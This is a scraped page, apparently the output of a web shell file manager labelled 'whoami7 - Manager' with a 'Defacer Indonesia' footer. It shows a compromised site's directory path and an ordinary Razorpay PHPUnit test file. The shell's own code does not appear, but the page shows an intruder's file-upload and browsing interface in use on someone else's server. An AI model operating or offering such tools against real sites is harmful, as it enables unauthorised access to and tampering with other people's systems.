whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
razorpay
/
razorpay
/
non_composer_tests
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/razorpay/razorpay/non_composer_tests/RazorpayTest.php
<?php namespace Razorpay\Api\Test; include 'Razorpay.php'; use Razorpay\Api\Api; class RazorpayTest extends \PHPUnit_Framework_TestCase { function setUp() { $this->api = new Api($_SERVER['KEY_ID'], $_SERVER['KEY_SECRET']); } public function testApiAccess() { $this->assertInstanceOf('Razorpay\Api\Api', $this->api); } public function testRequests() { $this->assertTrue(class_exists('\Requests')); } }
Copyright ©2021 || Defacer Indonesia